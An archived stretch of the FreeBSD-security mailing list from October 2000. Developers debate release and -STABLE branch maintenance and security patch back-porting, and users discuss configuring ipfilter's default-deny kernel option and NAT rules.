In-Reply-To: <200010051830.MAA01024@harmony.village.org>
References: <4.3.2.7.2.20001005105420.04a7b540@localhost> <20001004220906.D50210@dragon.nuxi.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 12:30 PM 10/5/2000, Warner Losh wrote:

>Otherwise would do a PR spin with the following patch to 3.x would do
>the trick (I'd call it -solid, because -stable is suitable for
>production machines).

Personally, I would equate "-SOLID" with "suitable for production machines" whereas -STABLE would be "OK for application developers and eager/early adopters but still settling down to the confidence level of -SOLID."

Which might imply setting things up so that the -STABLE branch becomes -SOLID after, say, a good .2 release.
--Brett

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Oct 5 16:41:27 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.sunesi.net (ns1.sunesi.net [196.15.192.194]) by hub.freebsd.org (Postfix) with ESMTP id 56FDD37B66E; Thu, 5 Oct 2000 16:41:20 -0700 (PDT)
Received: from nbm by ns1.sunesi.net with local (Exim 3.03 #1) id 13hKdP-000PKH-00; Fri, 06 Oct 2000 01:41:07 +0200
Date: Fri, 6 Oct 2000 01:41:07 +0200
From: Neil Blakey-Milner
To: Brett Glass
Cc: Warner Losh , developers@freebsd.org, security@freebsd.org
Subject: Re: Stable branch
Message-ID: <20001006014106.A97336@mithrandr.moria.org>
References: <4.3.2.7.2.20001005105420.04a7b540@localhost> <20001004220906.D50210@dragon.nuxi.com> <200010051830.MAA01024@harmony.village.org> <4.3.2.7.2.20001005173257.048b9f00@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <4.3.2.7.2.20001005173257.048b9f00@localhost>; from brett@lariat.org on Thu, Oct 05, 2000 at 05:36:56PM -0600
Organization: Sunesi Clinical Systems
X-Operating-System: FreeBSD 3.3-RELEASE i386
X-URL: http://rucus.ru.ac.za/~nbm/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu 2000-10-05 (17:36), Brett Glass wrote:
> At 12:30 PM 10/5/2000, Warner Losh wrote:
>
> >Otherwise would do a PR spin with the following patch to 3.x would do
> >the trick (I'd call it -solid, because -stable is suitable for
> >production machines).
>
> Personally, I would equate "-SOLID" with "suitable for production
> machines" whereas -STABLE would be "OK for application developers
> and eager/early adopters but still settling down to the confidence
> level of -SOLID."
>
> Which might imply setting things up so that the -STABLE branch
> becomes -SOLID after, say, a good .2 release.
Then people will say, "Oh no, it's the first -SOLID release, we should only start using it after two -SOLID releases".

Neil

--
Neil Blakey-Milner
Sunesi Clinical Systems
nbm@mithrandr.moria.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Oct 5 17: 0: 3 2000
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id EE9A737B66C for ; Thu, 5 Oct 2000 16:59:56 -0700 (PDT)
Received: (qmail 5352 invoked by uid 1000); 6 Oct 2000 00:02:52 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 6 Oct 2000 00:02:52 -0000
Date: Thu, 5 Oct 2000 19:02:52 -0500 (CDT)
From: Mike Silbersack
To: Brett Glass
Cc: Warner Losh , developers@freebsd.org, security@freebsd.org
Subject: Re: Stable branch
In-Reply-To: <4.3.2.7.2.20001005173257.048b9f00@localhost>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 5 Oct 2000, Brett Glass wrote:

> At 12:30 PM 10/5/2000, Warner Losh wrote:
>
> >Otherwise would do a PR spin with the following patch to 3.x would do
> >the trick (I'd call it -solid, because -stable is suitable for
> >production machines).
>
> Personally, I would equate "-SOLID" with "suitable for production
> machines" whereas -STABLE would be "OK for application developers
> and eager/early adopters but still settling down to the confidence
> level of -SOLID."
>
> Which might imply setting things up so that the -STABLE branch
> becomes -SOLID after, say, a good .2 release.
>
> --Brett

I think this is getting overly complex. What would be more useful is to continue managing the different branches as is currently done, but provide some assurance that you're getting something release quality when you update.
Some time ago, I recall Joe Greco commenting that he only ran releases because updating to stable was too much trouble due to the time it takes to rebuild a system in such a configuration. Additionally, it seems Brett's worried about encountering the situation where -stable is broken due to a bad commit.

Would there be some way for cvsup to honor sub-tags, so that, for example, 3.5.2 could be tagged after the libpasswd bug is fixed? This way, committers could feel more at ease when updating stuff in -stable, and cvsuppers could feel more confident updating to the latest pseudo-release in their branch, knowing that they're getting the same working system their friends told them about. It also simplifies security bulletins. No more dates to confuse people, just version numbers to compare.

Undoubtedly, this system would still require a full buildworld rather than simple patching, but it should help people's faith in -stable, hopefully.

Thoughts? I'm not sure if binary releases of these releases would be a good idea or not.
Mike "Silby" Silbersack

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Oct 5 17:10:37 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 7522B37B66D; Thu, 5 Oct 2000 17:10:28 -0700 (PDT)
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id UAA27755; Thu, 5 Oct 2000 20:10:41 -0400 (EDT) (envelope-from rjh@mohawk.net)
Date: Thu, 5 Oct 2000 20:10:41 -0400 (EDT)
From: Ralph Huntington
To: Warner Losh
Cc: developers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: Stable branch
In-Reply-To: <200010051824.MAA00945@harmony.village.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I see what you're saying. My suggestion only involved merging bug fixes and security patches into the latest prior version, i.e., 3.5.1 at this time. I would not go further back than that. I thought I was suggesting something that would be less work, not more, since it meant not adding new features into any prior stable branch and only merging fixes into the latest prior stable branch. Perhaps my view of this is simplistic, though, since I am relatively new to this discussion. In no way am I advocating increasing anyone's work load.

-=r=-

On Thu, 5 Oct 2000, Warner Losh wrote:

> In message Ralph Huntington writes:
> : the latest release (not current), i.e., since 4.x-RELEASE is the latest,
> : then 3.x-STABLE should be supported with bug fixes and security patches
> : until a 5.x-RELEASE is out.
> :
> : Does this seem unreasonable? -=r=-
>
> Yes and no. It sounds reasonable, but puts a significant burden on
> the security officer and his security team to make it happen. Having
> two machines for -current and -stable is bad enough, plus test
> compiling patches on the last N RELEASES of -stable puts a fair load
> on getting an advisory out. Making that include a second branch will
> nearly double the work and pita factor to make it happen. When I was
> doing 4.0-current, 3.2-stable, 3.2-release, 3.1-release, 3.0-release,
> 2.2.8-release and 2.2.8-stable regression testing on a couple of
> kernel patches it took me a *HUGE* amount of time. 40% of it for 4.x
> and 3.x and 60% for the 2.2.8-stable and -release. Why so much for
> 2.x? The original author of the patch hadn't back ported it, was
> disinclined to back port it, so I wound up doing it. This made it
> extremely painful to try to get the advisory out (I think it was 6
> weeks from the time the bug hit -current until I sent the advisory
> out).
>
> Until you pay someone to do this full time, it isn't going to happen.
> History has shown this. This suggestion comes up every N years, we do
> OK with it for a couple of months until one bug comes along that's
> such a pain in the butt that we say "screw this old stuff, I'm just
> going to stop doing it because it is too much of a pita and no one
> seems to care enough to help." and then are happy for a while until we
> cut the next major branch in which case we recapitulate the whole
> process.
>
> Sorry to be such a sour puss, but I've "been there, tried that" before.
> > Warner > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 17:23:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id 18E2C37B502 for ; Thu, 5 Oct 2000 17:23:31 -0700 (PDT) Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id UAA30399 for ; Thu, 5 Oct 2000 20:23:29 -0400 Message-ID: <39DCB90A.A32DC570@allmaui.com> Date: Thu, 05 Oct 2000 17:23:23 +0000 From: Craig Cowen X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: "freebsd-security@FreeBSD.ORG" Subject: ipfilter rules question Content-Type: multipart/alternative; boundary="------------8F20AEF3C6961C2E5C99EE73" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------8F20AEF3C6961C2E5C99EE73 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit I have setup ipf with options IPFILTER_DEFAULT_BLOCK in my kernel. When using ipnat, I have 'pass in on (private interface) from 192.168.0.1 to any keep state' in my rules. I have no rules specified for the public interface. The boxen behind the firewall can surf. Is this right and why. Seems to me I have to allow out on the public interface with keep state for it all to work. -- Craig Cowen 408-394-6673 Cell craig-pager@allmaui.com --------------8F20AEF3C6961C2E5C99EE73 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit I have setup ipf with options  IPFILTER_DEFAULT_BLOCK in my kernel.
From owner-freebsd-security Thu Oct 5 17:32:47 2000
Delivered-To: freebsd-security@freebsd.org
Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 188E137B503 for ; Thu, 5 Oct 2000 17:32:45 -0700 (PDT)
Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13hLRH-0006Hi-00; Fri, 06 Oct 2000 02:32:39 +0200
Date: Fri, 6 Oct 2000 02:32:39 +0200 (IST)
From: Roman Shterenzon
To: Darren Reed
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Default Deny
In-Reply-To: <200010052303.KAA22094@cairo.anu.edu.au>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 6 Oct 2000, Darren Reed wrote:

> In some mail from Craig Cowen, sie said:
> > Would someone please remind me how to config my kernel for default
> > deny with ipfilter?
>
> options IPFILTER_DEFAULT_BLOCK

Why isn't it mentioned in the LINT file?
I couldn't find it in the man pages either.
Should I file a PR?

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

From owner-freebsd-security Thu Oct 5 17:34:48 2000
Delivered-To: freebsd-security@freebsd.org
Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 8AFED37B675 for ; Thu, 5 Oct 2000 17:34:44 -0700 (PDT)
Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id LAA07087; Fri, 6 Oct 2000 11:34:30 +1100 (EST)
From: Darren Reed
Message-Id: <200010060034.LAA07087@cairo.anu.edu.au>
Subject: Re: Default Deny
To: roman@xpert.com (Roman Shterenzon)
Date: Fri, 6 Oct 2000 11:34:30 +1100 (Australia/NSW)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: from "Roman Shterenzon" at Oct 06, 2000 02:32:39 AM
X-Mailer: ELM [version 2.5 PL1]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In some mail from Roman Shterenzon, sie said:
>
> On Fri, 6 Oct 2000, Darren Reed wrote:
>
> > In some mail from Craig Cowen, sie said:
> > > Would someone please remind me how to config my kernel for default
> > > deny with ipfilter?
> >
> > options IPFILTER_DEFAULT_BLOCK
>
> Why isn't it mentioned in the LINT file?
> I couldn't find it in the man pages either.
> Should I file a PR?

That might be a good idea.
From owner-freebsd-security Thu Oct 5 17:35:45 2000
Delivered-To: freebsd-security@freebsd.org
Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id B27BA37B670 for ; Thu, 5 Oct 2000 17:35:41 -0700 (PDT)
Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id UAA01985 for ; Thu, 5 Oct 2000 20:35:40 -0400
Message-ID: <39DCBBE5.D547475A@allmaui.com>
Date: Thu, 05 Oct 2000 17:35:33 +0000
From: Craig Cowen
X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Default Deny
Content-Type: multipart/alternative; boundary="------------CD0291976C60E5147E2B0178"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I had a hell of a time finding this info when I first set up ipf.
obfusication.org has everything you need to know once you have it set up, but no precise setup info.

Craig

Roman Shterenzon wrote:

> On Fri, 6 Oct 2000, Darren Reed wrote:
>
> > In some mail from Craig Cowen, sie said:
> > > Would someone please remind me how to config my kernel for default
> > > deny with ipfilter?
> >
> > options IPFILTER_DEFAULT_BLOCK
>
> Why isn't it mentioned in the LINT file?
> I couldn't find it in the man pages either.
> Should I file a PR?
>
> --Roman Shterenzon, UNIX System Administrator and Consultant
> [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

-- 
Craig Cowen
408-394-6673 Cell
craig-pager@allmaui.com
From owner-freebsd-security Thu Oct 5 17:40:14 2000
Delivered-To: freebsd-security@freebsd.org
Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 3416837B503 for ; Thu, 5 Oct 2000 17:40:09 -0700 (PDT)
Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13hLYW-0006Jx-00; Fri, 06 Oct 2000 02:40:08 +0200
Date: Fri, 6 Oct 2000 02:40:08 +0200 (IST)
From: Roman Shterenzon
To: Craig Cowen
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Default Deny
In-Reply-To: <39DCBBE5.D547475A@allmaui.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 5 Oct 2000, Craig Cowen wrote:

> I had a hell of a time finding this info when I first set up ipf.
> obfusication.org has everything you need to know once you have it set up, but
> no precise setup info.
>
> Craig

The ipfilter in FreeBSD seems cursed or abandoned.
Example: this option is not documented.
Another example: there are no hooks to start ipfilter from /etc/rc* even though there's PR: 20202

> Roman Shterenzon wrote:
>
> > On Fri, 6 Oct 2000, Darren Reed wrote:
> >
> > > In some mail from Craig Cowen, sie said:
> > > > Would someone please remind me how to config my kernel for default
> > > > deny with ipfilter?
> > >
> > > options IPFILTER_DEFAULT_BLOCK
> >
> > Why isn't it mentioned in the LINT file?
> > I couldn't find it in the man pages either.
> > Should I file a PR?
> >
> > --Roman Shterenzon, UNIX System Administrator and Consultant
> > [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]
>
> -- 
> Craig Cowen
> 408-394-6673 Cell
> craig-pager@allmaui.com

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

From owner-freebsd-security Thu Oct 5 17:41:43 2000
Delivered-To: freebsd-security@freebsd.org
Received: from sasami.jurai.net (sasami.jurai.net [63.67.141.99]) by hub.freebsd.org (Postfix) with ESMTP id 38F0537B503 for ; Thu, 5 Oct 2000 17:41:40 -0700 (PDT)
Received: from localhost (scanner@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id UAA01115; Thu, 5 Oct 2000 20:41:23 -0400 (EDT)
Date: Thu, 5 Oct 2000 20:41:23 -0400 (EDT)
To: Darren Reed
Cc: Roman Shterenzon, freebsd-security@FreeBSD.ORG
Subject: Re: Default Deny
In-Reply-To: <200010060034.LAA07087@cairo.anu.edu.au>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > Why isn't it mentioned in the LINT file?
> > I couldn't find it in the man pages either.
> > Should I file a PR?
>
> That might be a good idea.

Darren, you could have committed a fix in the time it took you to reply to this email. So since you have the time, why not go fix it now? And he won't have to file a PR.

=============================================================================
-Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek
Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas
Home: scanner@deceptively.shady.org | http://open-systems.net
=============================================================================
WINDOWS: "Where do you want to go today?"
LINUX: "Where do you want to go tomorrow?"
BSD: "Are you guys coming or what?"
=============================================================================

From owner-freebsd-security Thu Oct 5 17:46:44 2000
Delivered-To: freebsd-security@freebsd.org
Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id A2AA837B502 for ; Thu, 5 Oct 2000 17:46:38 -0700 (PDT)
Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id LAA09224; Fri, 6 Oct 2000 11:46:28 +1100 (EST)
From: Darren Reed
Message-Id: <200010060046.LAA09224@cairo.anu.edu.au>
Subject: Re: Default Deny
To: scanner@jurai.net
Date: Fri, 6 Oct 2000 11:46:28 +1100 (Australia/NSW)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: from "scanner@jurai.net" at Oct 05, 2000 08:41:23 PM
X-Mailer: ELM [version 2.5 PL1]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In some mail from scanner@jurai.net, sie said:
>
> > > Why isn't it mentioned in the LINT file?
> > > I couldn't find it in the man pages either.
> > > Should I file a PR?
> >
> > That might be a good idea.
>
> Darren, you could have committed a fix in the time it took you to
> reply to this email. So since you have the time, why not go fix it now? And
> he won't have to file a PR.

You're assuming I have setup access to cvs for FreeBSD for everywhere that
I have access/accounts and that it'll still be on my mind when I'm in a
position to do so.
Darren

From owner-freebsd-security Thu Oct 5 17:49:51 2000
Delivered-To: freebsd-security@freebsd.org
Received: from sasami.jurai.net (sasami.jurai.net [63.67.141.99]) by hub.freebsd.org (Postfix) with ESMTP id B66F037B66C for ; Thu, 5 Oct 2000 17:49:48 -0700 (PDT)
Received: from localhost (scanner@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id UAA01287; Thu, 5 Oct 2000 20:49:42 -0400 (EDT)
Date: Thu, 5 Oct 2000 20:49:42 -0400 (EDT)
To: Darren Reed
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Default Deny
In-Reply-To: <200010060046.LAA09224@cairo.anu.edu.au>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 6 Oct 2000, Darren Reed wrote:

> You're assuming I have setup access to cvs for FreeBSD for everywhere that
> I have access/accounts and that it'll still be on my mind when I'm in a
> position to do so.

You have no boxes with your CVS tree running SSH?

=============================================================================
-Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek
Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas
Home: scanner@deceptively.shady.org | http://open-systems.net
=============================================================================
WINDOWS: "Where do you want to go today?"
LINUX: "Where do you want to go tomorrow?"
BSD: "Are you guys coming or what?"
=============================================================================

From owner-freebsd-security Thu Oct 5 17:56:57 2000
Delivered-To: freebsd-security@freebsd.org
Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 41B3737B502 for ; Thu, 5 Oct 2000 17:56:53 -0700 (PDT)
Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id LAA11152; Fri, 6 Oct 2000 11:56:45 +1100 (EST)
From: Darren Reed
Message-Id: <200010060056.LAA11152@cairo.anu.edu.au>
Subject: Re: Default Deny
To: scanner@jurai.net
Date: Fri, 6 Oct 2000 11:56:44 +1100 (Australia/NSW)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: from "scanner@jurai.net" at Oct 05, 2000 08:49:42 PM
X-Mailer: ELM [version 2.5 PL1]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In some mail from scanner@jurai.net, sie said:
>
> On Fri, 6 Oct 2000, Darren Reed wrote:
>
> > You're assuming I have setup access to cvs for FreeBSD for everywhere that
> > I have access/accounts and that it'll still be on my mind when I'm in a
> > position to do so.
>
> You have no boxes with your CVS tree running SSH?

Read what I said and then think about it rather than sending
off a mindless reply.
From owner-freebsd-security Thu Oct 5 18: 0:45 2000
Delivered-To: freebsd-security@freebsd.org
Received: from amazhan.bitstream.net (amazhan.bitstream.net [216.243.128.132]) by hub.freebsd.org (Postfix) with SMTP id D22AD37B502 for ; Thu, 5 Oct 2000 18:00:41 -0700 (PDT)
Received: (qmail 84062 invoked from network); 6 Oct 2000 01:00:40 -0000
Received: from unknown (HELO jah) (216.243.128.155) by amazhan with SMTP; 6 Oct 2000 01:00:40 -0000
Date: Thu, 5 Oct 2000 20:00:45 -0500 (CDT)
From: Dan Debertin
To: scanner@jurai.net
Cc: freebsd-security@freebsd.org
Subject: Re: Default Deny
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

My, how topical to freebsd security this is.

Look, a guy could have innumerable legitimate reasons for not being able to do this at the moment. You're being incredibly tiresome by belaboring Darren on-list.

BTW -- your grammar/spelling are terrible.

~Dan D.

--
++ Dan Debertin
++ Senior Systems Administrator
++ Bitstream Underground, LLC
++ airboss@bitstream.net
++ (612)321-9290

On Thu, 5 Oct 2000 scanner@jurai.net wrote:

> On Fri, 6 Oct 2000, Darren Reed wrote:
>
> > You're assuming I have setup access to cvs for FreeBSD for everywhere that
> > I have access/accounts and that it'll still be on my mind when I'm in a
> > position to do so.
>
> You have no boxes with your CVS tree running SSH?
>
> =============================================================================
> -Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek
> Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas
> Home: scanner@deceptively.shady.org | http://open-systems.net
> =============================================================================
> WINDOWS: "Where do you want to go today?"
> LINUX: "Where do you want to go tomorrow?"
> BSD: "Are you guys coming or what?"
> =============================================================================

From owner-freebsd-security Thu Oct 5 18: 1: 6 2000
Delivered-To: freebsd-security@freebsd.org
Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id 92DEC37B503 for ; Thu, 5 Oct 2000 18:00:59 -0700 (PDT)
Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id VAA03075; Thu, 5 Oct 2000 21:00:49 -0400
Message-ID: <39DCC1CB.5FDD7F90@allmaui.com>
Date: Thu, 05 Oct 2000 18:00:43 +0000
From: Craig Cowen
X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Darren Reed
Cc: scanner@jurai.net, freebsd-security@FreeBSD.ORG
Subject: Re: Default Deny
References: <200010060056.LAA11152@cairo.anu.edu.au>
Content-Type: multipart/alternative; boundary="------------ABCD0CD1D34BCD2C0E0A3EC7"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Would either of you take a moment from your bantering to answer a question I posted please?

I have set up ipf with options IPFILTER_DEFAULT_BLOCK in my kernel.
When using ipnat, I have 'pass in on (private interface) from 192.168.0.0/24 to any keep state' in my rules.

I have no rules specified for the public interface.
The boxen behind the firewall can surf.

Is this right, and why?

Seems to me I have to allow out on the public interface with keep state for it all to work.
Darren Reed wrote:

> In some mail from scanner@jurai.net, sie said:
> >
> > On Fri, 6 Oct 2000, Darren Reed wrote:
> >
> > > You're assuming I have setup access to cvs for FreeBSD for everywhere that
> > > I have access/accounts and that it'll still be on my mind when I'm in a
> > > position to do so.
> >
> > You have no boxes with your CVS tree running SSH?
>
> Read what I said and then think about it rather than sending
> off a mindless reply.

-- 
Craig Cowen
408-394-6673 Cell
craig-pager@allmaui.com

From owner-freebsd-security Thu Oct 5 19:54: 8 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 2889C37B502; Thu, 5 Oct 2000 19:54:01 -0700 (PDT)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id WAA57645; Thu, 5 Oct 2000 22:53:55 -0400 (EDT) (envelope-from robert@fledge.watson.org)
Date: Thu, 5 Oct 2000 22:53:55 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
To: Jordan Hubbard
Cc: John Baldwin, Brett Glass, freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org, Paul Richards, "David O'Brien", Ralph Huntington
Subject: Re: Stable branch
In-Reply-To: <1275.970785509@winston.osd.bsdi.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 5 Oct 2000, Jordan Hubbard wrote:

> > 2) Make release tags into branches, so that ERRATA and other relevant
>
> That scares me. I don't like the idea of n-way merges.

I'm not sure I see the n-way merge. When it's release time, you add -b to your release tag. When a fix is required, you merge it into -STABLE, and then if appropriate, into the release branch also. Most of the time, the release branch will only be touched for release-specific ERRATA, version number references, etc, and then occasionally for specifically back-ported security bugfixes or fixes related to release engineering botches. This means that after the release freeze ends, it's still possible to tweak the release in the CVS tree.
I would anticipate few if any changes ever being made to a release branch, but it would provide people a way to synchronize with release patch levels using cvsup and so on, rather than having to manually apply patches, and the SO having to verify manually that patches apply to release versions as well as to -STABLE.

This seems to reflect our various forms of customers:

1) I have a release, it has been tested extensively for production deployment, and I don't want to track -STABLE. I do want to be able to manage vital bug fixes and security fixes in this context. Upgrades and feature deployments are major events, meaning I need a stable code base that has been through a formal QA process.

   Answer: Track a specific RELEASE branch. Updates to the branch will be well tested, infrequent, and typically announced in the form of a security advisory or patch level announcement.

2) I have a release, and want to gradually pick up well-tested feature improvements over time, and avoid major jumps associated with version upgrades. I can tolerate a moving code base to gain these features, and when a security fix or vital bug fix comes out, I can afford a deployment process.

   Answer: Track a recent STABLE branch. Updates to the branch will be well tested, relatively frequent.

3) I'm an active developer or user willing to live on the edge in order to have access to, or assist in developing, new features in the FreeBSD operating system. Code changes don't scare me, I have ankles of steel that cannot be broken by errant committers.

   Answer: Track a recent CURRENT branch. Updates to the branch will be exciting, and quite frequent.
Robert N M Watson
robert@fledge.watson.org http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

From owner-freebsd-security Thu Oct 5 20:20:17 2000
Delivered-To: freebsd-security@freebsd.org
Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 0421D37B503; Thu, 5 Oct 2000 20:20:12 -0700 (PDT)
Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e963K5X03179; Thu, 5 Oct 2000 20:20:05 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com)
To: Robert Watson
Cc: John Baldwin, Brett Glass, freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org, Paul Richards, "David O'Brien", Ralph Huntington
Subject: Re: Stable branch
In-Reply-To: Message from Robert Watson of "Thu, 05 Oct 2000 22:53:55 EDT."
Date: Thu, 05 Oct 2000 20:20:05 -0700
Message-ID: <3175.970802405@winston.osd.bsdi.com>
From: Jordan Hubbard
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> I'm not sure I see the n-way merge.
> ..
> When a fix is required, you merge it into -STABLE, and then if
> appropriate, into the release branch also.

Which is the n-way aspect. You've just increased the amount of merging by n, where n is each active "release branch" you choose to support rather than being able to merge once to the branch head and point people at that. Sure, you can say it's only for the most minor patches and such and merge work will be minimal, but in order to support a user assumption that they can install release x and then stay on the release x branch from there on out, someone still has to remember to merge to several locations rather than one now. Ick.
> 1) I have a release, it has been tested extensively for production
> deployment, and I don't want to track -STABLE. I do want to be able to

It's only because they really wanted to track -SOLID that they currently feel that way. :)

- Jordan

From owner-freebsd-security Thu Oct 5 21: 7:30 2000
Delivered-To: freebsd-security@freebsd.org
